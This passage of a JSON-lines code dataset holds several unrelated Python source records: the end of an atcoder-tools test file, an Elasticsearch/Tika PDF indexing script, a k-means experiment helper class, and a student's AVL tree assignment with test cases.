\"agc\" in path]\n for html_path, answer_line in zip(agc_html_paths, answers):\n logger.debug(\"Testing {}\".format(html_path))\n constants = predict_constants(self._load(html_path))\n output_line = \"{:40} [mod]{:10} [yes]{:10} [no]{:10}\".format(html_path.split(\".\")[0],\n _to_str(\n constants.mod),\n _to_str(\n constants.yes_str),\n _to_str(constants.no_str))\n self.assertEqual(answer_line.rstrip(), output_line.rstrip())\n\n def test_yes_no_prediction_fails_when_failing_to_parse_html(self):\n try:\n predict_yes_no(\"broken html\")\n self.fail(\"Must not reach here\")\n except YesNoPredictionFailedError:\n pass\n\n def test_case_only_with_no_str(self):\n yes_str, no_str = predict_yes_no(self._load(\"agc001-D.html\"))\n self.assertEqual(None, yes_str)\n self.assertEqual(\"Impossible\", no_str)\n\n def test_predict_time_limit(self):\n timeout = predict_limit(self._load(\"dwacon2017-prelims-A.html\"))\n self.assertEqual(timeout, 2525)\n timeout = predict_limit(self._load(\"dwacon2017-prelims-E.html\"))\n self.assertEqual(timeout, 5252)\n\n @unittest.expectedFailure\n def test_tricky_mod_case_that_can_raise_multi_cands_error(self):\n # This test exists in order to demonstrate the current wrong behavior that throws MultipleModCandidatesError.\n # None is the true answer for ABC103-C. This test shouldn't fail with a better prediction method.\n # Please remove @unittest.expectedFailure when predict_modulo() behaves\n # correctly.\n\n modulo = predict_modulo(self._load(\"abc103-C.html\"))\n self.assertIsNone(modulo)\n\n @unittest.expectedFailure\n def test_tricky_yes_no_case_difficult_to_recognize(self):\n # This test exists in order to demonstrate the current wrong behavior that doesn't detect some yes/no strings.\n # Please remove @unittest.expectedFailure when predict_yes_no() behaves\n # correctly.\n\n yes_str, no_str = predict_yes_no(self._load(\"abc110-B.html\"))\n self.assertEqual(\"War\", yes_str)\n self.assertEqual(\"No War\", no_str)\n\n def test_relative_or_absolute_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n

    出力

    \\\\frac{1}{\\\\frac{1}{A_1} + \\ldots + \\\\frac{1}{A_N}} の値を表す小数 (または整数) を出力せよ。

    \n

    出力は、ジャッジの出力との絶対誤差または相対誤差が 10^{-5} 以下のとき正解と判定される。

    \n
    \"\"\")\n self.assertEqual(0.00001, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.AbsoluteOrRelative.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_absolute_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n

    出力

    \n
    \n 入力に基づいて逆算した 体重 [kg] を一行に出力せよ。
    \n 出力は絶対誤差が 10^{−2} 以下であれば許容される。
    \n なお、出力の最後には改行を入れること。\n
    \n
    \"\"\")\n self.assertEqual(0.01, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.Absolute.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_relative_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    出力

    すべての寿司が無くなるまでの操作回数の期待値を出力せよ。\n 相対誤差が 10^{-9} 以下ならば正解となる。

    \n
    \n
    \n \"\"\")\n self.assertEqual(0.000000001, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.Relative.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_normal_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    出力

    N! の正の約数の個数を 10^9+7 で割った余りを出力せよ。

    \n
    \n
    \n \"\"\")\n self.assertEqual(JudgeType.Normal.value,\n judge_method.to_dict()[\"judge_type\"])\n\n def test_judge_method_prediction_fails_with_multiple_cands(self):\n try:\n predict_judge_method(\n \"10^{-6} もしくは 10^{-5}以下の相対誤差\")\n self.fail(\"Must not reach here\")\n except MultipleDecimalCandidatesError:\n pass\n\n @unittest.expectedFailure\n def test_tricky_judge_method_case(self):\n # This test exists in order to demonstrate the current wrong behavior that detects unrelated mention wrongly.\n # Please remove @unittest.expectedFailure when predict_judge_method() behaves\n # correctly.\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    問題文

    N 人のクラスがあり、色 1,2,...,M の中から 1 つの色を選んでテーマカラーを決めることとなりました。

    \n

    それぞれの人が同確率でどれかの色 1 つに投票するとき、色 i(1 \\leq i \\leq M)r_i 票集まる確率を p とします。

    \n

    p \\geq 10^{-x} を満たす最小の整数 x を求めてください。

    \n

    ただし、p10^{-6} 以下の相対誤差が生じても x は変わらないことが保証されるものとします。

    \n
    \n
    \"\"\")\n self.assertEqual(JudgeType.Normal.value,\n judge_method.to_dict()[\"judge_type\"])\n\n def _load(self, html_path):\n with open(os.path.join(self.test_dir, html_path), 'r') as f:\n return f.read()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kyuridenamida/atcoder-tools","sub_path":"tests/test_constpred.py","file_name":"test_constpred.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"37"} +{"seq_id":"24174597797","text":"#!/usr/bin/env python\nimport logging\nimport os\n#import tika\nimport logging\nimport concurrent.futures\nfrom tika import parser, unpack\nfrom elasticsearch import Elasticsearch\n\"\"\"\nUse pytika from https://github.com/chrismattmann/tika-python to parse documents using tika server.\nTika server can be run as a docker image as described here: https://github.com/apache/tika-docker\nAuthor: Praveen Chamarthi\n\"\"\"\nDOC_PATH = '/path/to/documents/'\nTIKA_URL = \"http://localhost:9998/tika\"\nINDEX_NAME = \"knowledgeindex\"\nDOC_EXTENSION = \"pdf\"\n\ndef connect_elasticsearch(host=\"localhost\", port=\"9200\"):\n \"\"\" Function that returns a connection object. \n \n Arguments:\n host {str} -- Hostname (default is localhost)\n port {str} -- Portnumber (default is 9200)\n \"\"\"\n _es = None\n _es = Elasticsearch([{'host': host, 'port': port}])\n if _es.ping():\n logging.info('Connected...')\n else:\n logging.error(f\"Error connecting to ES Cluster: {host}:{port}\")\n return _es\n\ndef create_index(es_object, index_name=INDEX_NAME):\n \"\"\"\n Create a strict index mappings based on document metadata returned by tika.\n Also create a custom analyzer with an edge_ngram filter\n Refer to metadata-tika-sample.json for sample metadata fields returned\n\n Arguments:\n es_object {Object} -- Instance of elasticsearch connection object\n index_name {str} -- Name of elasticsearch index to create\n \"\"\"\n created = False\n # index settings\n \"\"\"\n IMPORTANT: mapping type is deprecated from es v7.0.0 and above\n https://www.elastic.co/guide/en/elasticsearch/reference/7.7/removal-of-types.html\n \"\"\"\n settings = {\n \"settings\": {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 2,\n \"analysis\": {\n \"filter\": {\n \"autocomplete_filter\": {\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 20\n }\n },\n \"analyzer\":{\n \"autocomplete\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"lowercase\",\n \"autocomplete_filter\"\n ]\n }\n }\n }\n },\n \"mappings\": {\n \"properties\": {\n \"title\": {\"type\": \"text\" },\n \"description\": {\"type\": \"text\" },\n \"author\": {\"type\": \"text\" },\n \"creation_date\": {\"type\": \"date\" },\n \"content_type\": {\"type\": \"text\" },\n \"keywords\": {\"type\": \"text\" },\n \"num_pages\": {\"type\": \"integer\" },\n \"filename\": {\"type\": \"text\" },\n \"content\": {\"type\": \"text\" }\n }\n }\n }\n try:\n if not es_object.indices.exists(INDEX_NAME):\n # Ignore 400 means to ignore \"Index Already Exist\" error.\n es_object.indices.create(index=INDEX_NAME, ignore=400, body=settings)\n logging.info('Created Index')\n created = True\n except Exception as ex:\n logging.error(f\"Error creating Index: {ex}\")\n finally:\n return created\n\ndef prepare_index_record(document_path, tika_url=TIKA_URL):\n \"\"\"\n Prepares the record object (dict) after querying tika using the unpack.\n Unpack returns metadata and content in the response dict.\n\n Arguments:\n 
document_path {str} -- Full Path to the document to be sent to tika\n        tika_url {str} -- (optional) full url to tika server\n    \"\"\"\n    parsed = unpack.from_file(document_path, tika_url)\n    metadata = parsed[\"metadata\"]\n    content = parsed[\"content\"]\n    # Fall back through the alternative metadata keys in order; a missing or empty\n    # value drops through to the next candidate key.\n    title = metadata.get(\"title\") or metadata.get(\"dc:title\") or metadata.get(\"pdf.docinfo:title\") or \"NoTitle\"\n    author = metadata.get(\"Author\") or metadata.get(\"meta:author\") or \"NoAuthor\"\n    subject = metadata.get(\"subject\", \"NoSubject\")\n    keywords = metadata.get(\"Keywords\") or metadata.get(\"meta:keyword\") or metadata.get(\"pdf.docinfo:keywords\") or \"NoKeywords\"\n    resourcename = metadata.get(\"resourceName\", \"NoResourceName\")\n    record = {\n        \"title\": title,\n        \"description\": subject,\n        \"author\": author,\n        \"creation_date\": metadata[\"Creation-Date\"],\n        \"content_type\": metadata[\"Content-Type\"],\n        \"keywords\": keywords,\n        \"num_pages\": metadata[\"xmpTPg:NPages\"],\n        \"filename\": resourcename,\n        \"content\": content\n    }\n    return record\n\ndef add_record_to_index(elastic_connection, \n                        document_path, \n                        tika_url=TIKA_URL, \n                        index_name=INDEX_NAME):\n    \"\"\"\n    Sends document(record) to elasticsearch for index.\n\n    Arguments:\n        elastic_connection {object} -- connection object to elasticsearch\n        document_path {str} -- Full Path to the document to be sent to tika\n        tika_url {str} -- URI to tika server e.g. http://localhost:9998/tika\n        index_name {str} -- name of the elasticsearch index\n    \"\"\"\n    record = prepare_index_record(document_path, tika_url)\n    index_confirmation = None\n    try:\n        index_confirmation = elastic_connection.index(index=index_name, body=record)\n    except Exception as exc:\n        logging.error(f\"{document_path} Error indexing data {exc}\")\n    return index_confirmation\n\ndef get_documents(path_to_scan):\n    \"\"\"\n    returns a list of paths (FQDN) of all documents under the top level directory.\n\n    Arguments:\n        path_to_scan {str} -- Full Path to the top level directory where the documents reside\n    \"\"\"\n    full_names = []\n    for (dirpath, _, filenames) in os.walk(path_to_scan):\n        full_names = [os.path.join(dirpath, fn) for fn in filenames if fn.endswith(DOC_EXTENSION)]\n        break\n    return full_names\n\ndef create_logger():\n    \"\"\" Basic logger to write to console and to a file for debug info. 
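\n    Writes DEBUG-and-above records to DEBUG.log (overwritten each run) and mirrors\n    INFO-and-above to the console.\n    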
\"\"\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='DEBUG.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\nif __name__ == \"__main__\":\n create_logger()\n logging.info(f\"Connecting to ES ...\")\n es_conn = connect_elasticsearch()\n if not es_conn.indices.exists(INDEX_NAME):\n logging.info(f\"Creating index {INDEX_NAME} ...\")\n create_index(es_conn)\n else:\n logging.info(f\"Skipping Index creation... {INDEX_NAME} already exists\")\n if os.path.exists(DOC_PATH):\n logging.info(f\"Scanning DIR: {DOC_PATH} ...\")\n full_names = get_documents(DOC_PATH)\n if not full_names:\n logging.info(f\"No docs with extension: {DOC_EXTENSION} found under: {DOC_PATH}\")\n else:\n logging.error(f\"Path: {DOC_PATH} doesn't exist\")\n exit\n\n # Use ThreadPoolExecutor to index documents in parallel with 5 workers\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_kdoc = {executor.submit(add_record_to_index, es_conn, kdoc, TIKA_URL): kdoc for kdoc in full_names}\n # print(future_to_kdoc)\n for future in concurrent.futures.as_completed(future_to_kdoc):\n kdoc = future_to_kdoc[future]\n logging.info(f\"Indexing: {kdoc}...\")\n try:\n data = future.result()\n except Exception as exc:\n logging.error(\"Indexing %r generated an exception: %s\" % (kdoc, exc))\n else:\n logging.info(\"document %s indexed successfully\" % (kdoc))\n\n\n","repo_name":"praveenc/elasticsearch-python","sub_path":"elasticsearch-apachetika/es-indexdocs-tika.py","file_name":"es-indexdocs-tika.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39893230745","text":"#!/usr/bin/python\n\"\"\"\nclusters\ncentres\naverages(distance/area)[]\ndistance\n\n\nExperimentInstance is the class to help us extract information from a series of experiment runs.\n\"\"\"\nfrom lib.scripts.experiment_cluster import *\nfrom lib.scripts.experiment_utils import distance\nimport sys\n\nclass ExperimentInstance:\n \"\"\"\n returns an array of arrays corresponding to the point positions of every centre\n in the experiment run. 
These point positions are disjoint and are calculated based\n    on the closest points to each centre.\n    \"\"\"\n    def calcPointPositions(self):\n        result = [[] for _ in range(len(self.centres))]\n        for instId in range(len(ExperimentInstance.dataset)):\n            currCandidateCentreId = 0\n            minDistance = sys.float_info.max\n            for centreId in range(len(self.centres)):\n                currDistance = distance(ExperimentInstance.dataset[instId], self.centres[centreId])\n                if minDistance > currDistance:\n                    minDistance = currDistance\n                    currCandidateCentreId = centreId\n            result[currCandidateCentreId].append(instId)\n        return result\n\n    def __init__(self, centres, algorithm, totalDistanceToCentres, seedPickingTime, numIterations, iterationsRuntime):\n        assert hasattr(ExperimentInstance, 'dataset')\n        self.centres = centres\n        self.algorithm = algorithm\n        self.totalDistanceToCentres = totalDistanceToCentres\n        self.seedPickingTime = seedPickingTime\n        self.numIterations = numIterations\n        self.iterationsRuntime = iterationsRuntime\n        self.clusters = []\n        pointPositions = self.calcPointPositions()\n        for centre, p in zip(self.centres, pointPositions):\n            self.clusters.append(Cluster(centre, p))\n        self.averageDistancesOverArea_ = None\n\n    @property\n    def averageDistancesOverArea(self):\n        if self.averageDistancesOverArea_ is None:\n            self.averageDistancesOverArea_ = [c.totalDistance / c.area for c in self.clusters]\n        return self.averageDistancesOverArea_\n\n\n\n    def centresToString(self):\n        result = \"\"\n        for inst in self.centres:\n            result += str(inst[0]) + \" \" + str(inst[1]) + \"\\n\"\n        return result\n\n    def __str__(self):\n        return (\">>>Start Experiment\\n\" +\n                \"algorithm:\" + self.algorithm + \"\\n\" +\n                \"Sum of distance squared to centre:\" + str(self.totalDistanceToCentres) + \"\\n\" +\n                \"Time to pick the seeds:\" + str(self.seedPickingTime) + \"\\n\" +\n                \"Number of iterations run:\" + str(self.numIterations) + \"\\n\" +\n                \"Time to run the iterations:\" + str(self.iterationsRuntime) + \"\\n\" +\n                \"Start Centres:\\n\" + self.centresToString() +\n                \"End Centres:\\n\" +\n                \"End Experiment:\"\n                )\n","repo_name":"technoligest/kmeansII","sub_path":"lib/scripts/experiment_instance.py","file_name":"experiment_instance.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37171165951","text":"# Name: Robert Smith\n# OSU Email: Smithro8@oregonstate.edu\n# Course: CS261 - Data Structures\n# Assignment: 4\n# Due Date: 02/27/2023\n# Description: Creates an AVL Tree (balancing tree). Has methods for remove and add,\n# with helper methods to facilitate those functions.\n\nimport random\nfrom queue_and_stack import Queue, Stack\nfrom bst import BSTNode, BST\n\n\nclass AVLNode(BSTNode):\n    \"\"\"\n    AVL Tree Node class. Inherits from BSTNode\n    DO NOT CHANGE THIS CLASS IN ANY WAY\n    \"\"\"\n\n    def __init__(self, value: object) -> None:\n        \"\"\"\n        Initialize a new AVL node\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        # call __init__() from parent class\n        super().__init__(value)\n        # new variables needed for AVL\n        self.parent = None\n        self.height = 0\n\n    def __str__(self) -> str:\n        \"\"\"\n        Override string method\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        return 'AVL Node: {}'.format(self.value)\n\n\nclass AVL(BST):\n    \"\"\"\n    AVL Tree class. 
Inherits from BST\n    \"\"\"\n\n    def __init__(self, start_tree=None) -> None:\n        \"\"\"\n        Initialize a new AVL Tree\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        # call __init__() from parent class\n        super().__init__(start_tree)\n\n    def __str__(self) -> str:\n        \"\"\"\n        Override string method\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        values = []\n        super()._str_helper(self._root, values)\n        return \"AVL pre-order { \" + \", \".join(values) + \" }\"\n\n    def is_valid_avl(self) -> bool:\n        \"\"\"\n        Perform pre-order traversal of the tree. Return False if there\n        are any problems with attributes of any of the nodes in the tree.\n        This is intended to be a troubleshooting 'helper' method to help\n        find any inconsistencies in the tree after the add() or remove()\n        operations. Review the code to understand what this method is\n        checking and how it determines whether the AVL tree is correct.\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        stack = Stack()\n        stack.push(self._root)\n        while not stack.is_empty():\n            node = stack.pop()\n            if node:\n                # check for correct height (relative to children)\n                left = node.left.height if node.left else -1\n                right = node.right.height if node.right else -1\n                if node.height != 1 + max(left, right):\n                    print(\"height\")\n                    return False\n                if node.parent:\n                    # parent and child pointers are in sync\n                    if node.value < node.parent.value:\n                        check_node = node.parent.left\n                    else:\n                        check_node = node.parent.right\n                    if check_node != node:\n                        print(\"p/c pointers\")\n                        return False\n                else:\n                    # NULL parent is only allowed on the root of the tree\n                    if node != self._root:\n                        print(\"null parent\")\n                        return False\n                stack.push(node.right)\n                stack.push(node.left)\n        return True\n\n    # ------------------------------------------------------------------ #\n    def add(self, value: object) -> None:\n        \"\"\"\n        Adds a passed value to AVL\n        Creates tree if empty\n        Rebalances after add\n        \"\"\"\n\n        # if empty\n        if self._root is None:\n            self._root = AVLNode(value)\n            return\n        # if repeat value\n        if value == self._root.value:\n            return\n        # iterates to end node\n        node = self._root\n        parent_node = None\n        while node is not None:\n            parent_node = node\n            if value == node.value:\n                return\n            if value < node.value:\n                node = node.left\n            else:\n                node = node.right\n        # assigns proper node and parent\n        if value < parent_node.value:\n            parent_node.left = AVLNode(value)\n            parent_node.left.parent = parent_node\n        if value > parent_node.value:\n            parent_node.right = AVLNode(value)\n            parent_node.right.parent = parent_node\n        # rebalance from parent node up\n        while parent_node is not None:\n            self._rebalance(parent_node)\n            parent_node = parent_node.parent\n\n    def remove(self, value: object) -> bool:\n        \"\"\"\n        Removes a passed value and returns True if removed,\n        else returns False\n        Rebalances after removal\n        \"\"\"\n        # if empty\n        if self._root is None:\n            return False\n        # calls find_remove_node to get the node and its parent\n        remove_node, remove_parent = self.find_remove_node(value)\n        # if value not found in tree\n        if remove_node is None:\n            return False\n        # no children\n        if remove_node.left is None and remove_node.right is None:\n            self._remove_no_subtrees(remove_parent, remove_node)\n            self._remove_rebalance(remove_node)\n            return True\n        # one subtree\n        if remove_node.left is not None and remove_node.right is None or \\\n                remove_node.left is None and remove_node.right is not None:\n            self._remove_one_subtree(remove_parent, remove_node)\n            # point the removed node's subtree to its parent\n            if remove_node.right is not None:\n                remove_node.right.parent = 
remove_parent\n            else:\n                remove_node.left.parent = remove_parent\n            self._remove_rebalance(remove_parent)\n            return True\n        # two subtrees\n        if remove_node.left is not None and remove_node.right is not None:\n            successor_parent = self._remove_two_subtrees(remove_parent, remove_node)\n            # rebalance from successor parent up\n            self._remove_rebalance(successor_parent)\n            return True\n        else:\n            return False\n\n    def _remove_two_subtrees(self, remove_parent: AVLNode, remove_node: AVLNode) -> AVLNode:\n        \"\"\"\n        removes node that has two subtrees\n        changes pointers to proper parent/child\n        \"\"\"\n        # find the successor and its parent\n        successor, successor_parent = self.find_successor(remove_node)\n        if successor_parent is None:\n            successor_parent = successor\n        # if root\n        if self._root == remove_node:\n            # if root successor is roots right node\n            if self._root.right == successor:\n                self._root.value = successor.value\n                self._root.right = successor.right\n                return successor_parent\n            if self._root.right != successor:\n                self._root.value = successor.value\n                successor_parent.left = successor.right\n                if successor.right is not None:\n                    successor.right.parent = successor_parent\n                successor.right = None\n                return successor_parent\n        # assigns remove left to successor left and parent pointer\n        successor.left = remove_node.left\n        successor.left.parent = successor\n        if successor != remove_node.right:\n            # replaces successor with its right\n            successor_parent.left = successor.right\n            if successor.right is not None:\n                successor.right.parent = successor_parent\n            # successor gets remove's right and parent\n            successor.right = remove_node.right\n            remove_node.right.parent = successor\n        # reassign successor parent if its parent is remove node\n        if successor_parent.parent == remove_node:\n            successor_parent.parent = successor\n            successor.parent = remove_parent.parent\n        # assigns successor pointer to remove parent\n        successor.parent = remove_parent\n        # assigns successor to proper parent node\n        if remove_parent.value < successor.value:\n            remove_parent.right = successor\n        else:\n            remove_parent.left = successor\n        return successor_parent\n\n    def _remove_rebalance(self, parent_node: AVLNode):\n        \"\"\"\n        Rebalances from the passed node all the way to the root\n        \"\"\"\n        while parent_node is not None:\n            self._rebalance(parent_node)\n            parent_node = parent_node.parent\n\n    def _balance_factor(self, node: AVLNode) -> int:\n        \"\"\"\n        Returns the balance factor of the node passed\n        \"\"\"\n        return self._get_height(node.right) - self._get_height(node.left)\n\n    def _get_height(self, node: AVLNode) -> int:\n        \"\"\"\n        Gets the height of the node passed\n        \"\"\"\n        # recursively adds the height of nodes, returns max\n        if node is None:\n            return -1\n        left_height = self._get_height(node.left)\n        right_height = self._get_height(node.right)\n        return max(left_height, right_height) + 1\n\n    def _rotate_left(self, node: AVLNode) -> AVLNode:\n        \"\"\"\n        Returns a node after single left rotation around the node passed\n        \"\"\"\n        child = node.right\n        node.right = child.left\n        if node.right is not None:\n            node.right.parent = node\n        child.left = node\n        node.parent = child\n        self._update_height(node)\n        self._update_height(child)\n        return child\n\n    def _rotate_right(self, node: AVLNode) -> AVLNode:\n        \"\"\"\n        Returns a node after single right rotation around the node passed\n        \"\"\"\n        child = node.left\n        node.left = child.right\n        if node.left is not None:\n            node.left.parent = node\n        child.right = node\n        node.parent = child\n        self._update_height(node)\n        self._update_height(child)\n        
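# Height refresh order matters here: node has just become child's right subtree,\n        # so node's height is recomputed first, then child's height on top of it.\n        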
return child\n\n def _update_height(self, node: AVLNode) -> None:\n \"\"\"\n Sets the nodes height\n \"\"\"\n\n node.height = max(self._get_height(node.left), self._get_height(node.right)) + 1\n\n def _rebalance(self, node: AVLNode) -> None:\n \"\"\"\n Rebalances the node passed (LL,RR,LR,RL)\n \"\"\"\n\n if self._balance_factor(node) < -1:\n if self._balance_factor(node.left) > 0:\n node.left = self._rotate_left(node.left)\n node.left.parent = node\n # saves nodes parent\n previous_node_parent = node.parent\n new_subtree_root = self._rotate_right(node)\n # assigns rotated node to parent\n new_subtree_root.parent = previous_node_parent\n # if root\n if previous_node_parent is None:\n self._root = new_subtree_root\n return\n # assigns node to parent L/R\n if previous_node_parent.value > new_subtree_root.value:\n previous_node_parent.left = new_subtree_root\n else:\n previous_node_parent.right = new_subtree_root\n elif self._balance_factor(node) > 1:\n if self._balance_factor(node.right) < 0:\n node.right = self._rotate_right(node.right)\n node.right.parent = node\n # saves nodes parent\n previous_node_parent = node.parent\n new_subtree_root = self._rotate_left(node)\n # assigns rotated node to parent\n new_subtree_root.parent = previous_node_parent\n # if root\n if previous_node_parent is None:\n self._root = new_subtree_root\n return\n # assigns node to parent L/R\n if previous_node_parent.value > new_subtree_root.value:\n previous_node_parent.left = new_subtree_root\n else:\n previous_node_parent.right = new_subtree_root\n else:\n self._update_height(node)\n\n\n# ------------------- BASIC TESTING -----------------------------------------\nif __name__ == '__main__':\n # print(\"\\nPDF - method add() example 1\")\n # # -27, -77, -97, -54, 26, 23, 15, 75, 60, 88 right answer\n # print(\"----------------------------\")\n # test_cases = (\n # (1,2,3), # RR\n # (3, 2, 1), # LL\n # (1, 3, 2), # RL\n # (3, 1, 2), # LR\n # )\n # for case in test_cases:\n # tree = AVL(case)\n # print(tree)\n # print(\"\\nPDF - method add() example 2\")\n # print(\"----------------------------\")\n # test_cases = (\n # (10, 20, 30, 40, 50), # RR, RR\n # (10, 20, 30, 50, 40), # RR, RL\n # (30, 20, 10, 5, 1), # LL, LL\n # (30, 20, 10, 1, 5), # LL, LR\n # (5, 4, 6, 3, 7, 2, 8), # LL, RR\n # (range(0, 30, 3)),\n # (range(0, 31, 3)),\n # (range(0, 34, 3)),\n # (range(10, -10, -2)),\n # ('A', 'B', 'C', 'D', 'E'),\n # (1, 1, 1, 1),\n # )\n # for case in test_cases:\n # tree = AVL(case)\n # print('INPUT :', case)\n # print('RESULT :', tree)\n # print(\"\\nPDF - method add() example 3\")\n # print(\"----------------------------\")\n # for _ in range(100):\n # case = list(set(random.randrange(1, 20000) for _ in range(900)))\n # tree = AVL()\n # for value in case:\n # tree.add(value)\n # if not tree.is_valid_avl():\n # raise Exception(\"PROBLEM WITH ADD OPERATION\")\n # print('add() stress test finished')\n print(\"\\nPDF - method remove() example 1\")\n print(\"-------------------------------\")\n test_cases = (\n ((1, 2, 3), 2), # no AVL rotation\n ((1, 2, 3), 1), # no AVL rotation\n ((1, 2, 3), 3), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 0),\n ((50, 40, 60, 30, 70, 20, 80, 45), 45), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 40), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 30), # no AVL rotation\n )\n for case, del_value in test_cases:\n tree = AVL(case)\n print('INPUT :', tree, \"DEL:\", del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() 
example 2\")\n print(\"-------------------------------\")\n test_cases = (\n ((-94, 5, 27, -23, 28, 17, -14, 21, -37, 60), -94), # RR\n (( 5, -23, -37, -14, 27, 17, 21, 28, 60), 27), # LL\n ((5, -23, -37, -14, 21, 17, 28, 60), 28), # RL\n\n )\n for case, del_value in test_cases:\n tree = AVL(case)\n print('INPUT :', tree, \"DEL:\", del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() example 3\")\n print(\"-------------------------------\")\n case = range(-9, 16, 2)\n tree = AVL(case)\n for del_value in case:\n print('INPUT :', tree, del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() example 4\")\n print(\"-------------------------------\")\n case = [-24, 73, -84, 49, 51, 19, 58, -37, -68, 95]\n remove = [-24]\n tree = AVL(case)\n for x in remove:\n\n print('INPUT :', tree, x)\n tree.remove(x)\n print('RESULT :', tree)\n # print(\"\\nPDF - method remove() example 5\")\n # print(\"-------------------------------\")\n # for _ in range(100):\n # case = list(set(random.randrange(1, 20000) for _ in range(900)))\n # tree = AVL(case)\n # for value in case[::2]:\n # tree.remove(value)\n # if not tree.is_valid_avl():\n # raise Exception(\"PROBLEM WITH REMOVE OPERATION\")\n # print('remove() stress test finished')\n # print(\"\\nPDF - method contains() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 5, 15])\n # print(tree.contains(15))\n # print(tree.contains(-10))\n # print(tree.contains(15))\n # print(\"\\nPDF - method contains() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL()\n # print(tree.contains(0))\n # print(\"\\nPDF - method inorder_traversal() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree.inorder_traversal())\n # print(\"\\nPDF - method inorder_traversal() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree.inorder_traversal())\n # print(\"\\nPDF - method find_min() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree)\n # print(\"Minimum value is:\", tree.find_min())\n # print(\"\\nPDF - method find_min() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree)\n # print(\"Minimum value is:\", tree.find_min())\n # print(\"\\nPDF - method find_max() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree)\n # print(\"Maximum value is:\", tree.find_max())\n # print(\"\\nPDF - method find_max() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree)\n # print(\"Maximum value is:\", tree.find_max())\n # print(\"\\nPDF - method is_empty() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(\"Tree is empty:\", tree.is_empty())\n # print(\"\\nPDF - method is_empty() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL()\n # print(\"Tree is empty:\", tree.is_empty())\n # print(\"\\nPDF - method make_empty() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(\"Tree before make_empty():\", tree)\n # tree.make_empty()\n # print(\"Tree after make_empty(): \", tree)\n # print(\"\\nPDF - method make_empty() example 2\")\n # 
